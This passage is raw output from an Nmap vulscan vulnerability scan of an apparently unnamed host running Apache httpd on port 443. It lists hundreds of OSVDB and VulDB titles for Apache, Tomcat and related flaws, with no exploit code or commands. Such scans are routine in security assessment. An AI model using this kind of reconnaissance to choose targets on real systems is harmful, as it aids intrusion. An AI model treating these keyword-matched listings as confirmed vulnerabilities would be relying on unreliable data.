12313| [16586] Apache HTTP Server Win32 GET Overflow DoS
12314| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
12315| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
12316| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
12317| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
12318| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
12319| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
12320| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
12321| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
12322| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
12323| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
12324| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
12325| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
12326| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
12327| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
12328| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
12329| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
12330| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
12331| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
12332| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
12333| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
12334| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
12335| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
12336| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
12337| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
12338| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
12339| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
12340| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
12341| [13304] Apache Tomcat realPath.jsp Path Disclosure
12342| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
12343| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
12344| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
12345| [12848] Apache HTTP Server htdigest realm Variable Overflow
12346| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
12347| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
12348| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
12349| [12557] Apache HTTP Server prefork MPM accept Error DoS
12350| [12233] Apache Tomcat MS-DOS Device Name Request DoS
12351| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
12352| [12231] Apache Tomcat web.xml Arbitrary File Access
12353| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
12354| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
12355| [12178] Apache Jakarta Lucene results.jsp XSS
12356| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
12357| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
12358| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
12359| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
12360| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
12361| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
12362| [10471] Apache Xerces-C++ XML Parser DoS
12363| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
12364| [10068] Apache HTTP Server htpasswd Local Overflow
12365| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
12366| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
12367| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
12368| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
12369| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
12370| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
12371| [9717] Apache HTTP Server mod_cookies Cookie Overflow
12372| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
12373| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
12374| [9714] Apache Authentication Module Threaded MPM DoS
12375| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
12376| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
12377| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
12378| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
12379| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
12380| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
12381| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
12382| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
12383| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
12384| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
12385| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
12386| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
12387| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
12388| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
12389| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
12390| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
12391| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
12392| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
12393| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
12394| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
12395| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
12396| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
12397| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
12398| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
12399| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
12400| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
12401| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
12402| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
12403| [9208] Apache Tomcat .jsp Encoded Newline XSS
12404| [9204] Apache Tomcat ROOT Application XSS
12405| [9203] Apache Tomcat examples Application XSS
12406| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
12407| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
12408| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
12409| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
12410| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
12411| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
12412| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
12413| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
12414| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
12415| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
12416| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
12417| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
12418| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
12419| [7611] Apache HTTP Server mod_alias Local Overflow
12420| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
12421| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
12422| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
12423| [6882] Apache mod_python Malformed Query String Variant DoS
12424| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
12425| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
12426| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
12427| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
12428| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
12429| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
12430| [5526] Apache Tomcat Long .JSP URI Path Disclosure
12431| [5278] Apache Tomcat web.xml Restriction Bypass
12432| [5051] Apache Tomcat Null Character DoS
12433| [4973] Apache Tomcat servlet Mapping XSS
12434| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
12435| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
12436| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
12437| [4568] mod_survey For Apache ENV Tags SQL Injection
12438| [4553] Apache HTTP Server ApacheBench Overflow DoS
12439| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
12440| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
12441| [4383] Apache HTTP Server Socket Race Condition DoS
12442| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
12443| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
12444| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
12445| [4231] Apache Cocoon Error Page Server Path Disclosure
12446| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
12447| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
12448| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
12449| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
12450| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
12451| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
12452| [3322] mod_php for Apache HTTP Server Process Hijack
12453| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
12454| [2885] Apache mod_python Malformed Query String DoS
12455| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
12456| [2733] Apache HTTP Server mod_rewrite Local Overflow
12457| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
12458| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
12459| [2149] Apache::Gallery Privilege Escalation
12460| [2107] Apache HTTP Server mod_ssl Host: Header XSS
12461| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
12462| [1833] Apache HTTP Server Multiple Slash GET Request DoS
12463| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
12464| [872] Apache Tomcat Multiple Default Accounts
12465| [862] Apache HTTP Server SSI Error Page XSS
12466| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
12467| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
12468| [845] Apache Tomcat MSDOS Device XSS
12469| [844] Apache Tomcat Java Servlet Error Page XSS
12470| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
12471| [838] Apache HTTP Server Chunked Encoding Remote Overflow
12472| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
12473| [775] Apache mod_python Module Importing Privilege Function Execution
12474| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
12475| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
12476| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
12477| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
12478| [637] Apache HTTP Server UserDir Directive Username Enumeration
12479| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
12480| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
12481| [562] Apache HTTP Server mod_info /server-info Information Disclosure
12482| [561] Apache Web Servers mod_status /server-status Information Disclosure
12483| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
12484| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
12485| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
12486| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
12487| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
12488| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
12489| [376] Apache Tomcat contextAdmin Arbitrary File Access
12490| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
12491| [222] Apache HTTP Server test-cgi Arbitrary File Access
12492| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
12493| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
12494|_
12495139/tcp closed netbios-ssn
12496443/tcp open ssl/http Apache httpd
12497|_http-server-header: Apache
12498| vulscan: VulDB - https://vuldb.com:
12499| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
12500| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
12501| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
12502| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
12503| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
12504| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
12505| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
12506| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
12507| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
12508| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
12509| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
12510| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
12511| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
12512| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
12513| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
12514| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
12515| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
12516| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
12517| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
12518| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
12519| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
12520| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
12521| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
12522| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
12523| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
12524| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
12525| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
12526| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
12527| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
12528| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
12529| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
12530| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
12531| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
12532| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
12533| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
12534| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
12535| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
12536| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
12537| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
12538| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
12539| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
12540| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
12541| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
12542| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
12543| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
12544| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
12545| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
12546| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
12547| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
12548| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
12549| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
12550| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
12551| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
12552| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
12553| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
12554| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
12555| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
12556| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
12557| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
12558| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
12559| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
12560| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
12561| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
12562| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
12563| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
12564| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
12565| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
12566| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
12567| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
12568| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
12569| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
12570| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
12571| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
12572| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
12573| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
12574| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
12575| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
12576| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
12577| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
12578| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
12579| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
12580| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
12581| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
12582| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
12583| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
12584| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
12585| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
12586| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
12587| [136370] Apache Fineract up to 1.2.x sql injection
12588| [136369] Apache Fineract up to 1.2.x sql injection
12589| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
12590| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
12591| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
12592| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
12593| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
12594| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
12595| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
12596| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
12597| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
12598| [134416] Apache Sanselan 0.97-incubator Loop denial of service
12599| [134415] Apache Sanselan 0.97-incubator Hang denial of service
12600| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
12601| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
12602| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
12603| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
12604| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
12605| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
12606| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
12607| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
12608| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
12609| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
12610| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
12611| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
12612| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
12613| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
12614| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
12615| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
12616| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
12617| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
12618| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
12619| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
12620| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
12621| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
12622| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
12623| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
12624| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
12625| [131859] Apache Hadoop up to 2.9.1 privilege escalation
12626| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
12627| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
12628| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
12629| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
12630| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
12631| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
12632| [130629] Apache Guacamole Cookie Flag weak encryption
12633| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
12634| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
12635| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
12636| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
12637| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
12638| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
12639| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
12640| [130123] Apache Airflow up to 1.8.2 information disclosure
12641| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
12642| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
12643| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
12644| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
12645| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
12646| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
12647| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
12648| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
12649| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
12650| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
12651| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
12652| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
12653| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
12654| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
12655| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
12656| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
12657| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
12658| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
12659| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
12660| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
12661| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
12662| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
12663| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
12664| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
12665| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
12666| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
12667| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
12668| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
12669| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
12670| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
12671| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
12672| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
12673| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
12674| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
12675| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
12676| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
12677| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
12678| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
12679| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
12680| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
12681| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
12682| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
12683| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
12684| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
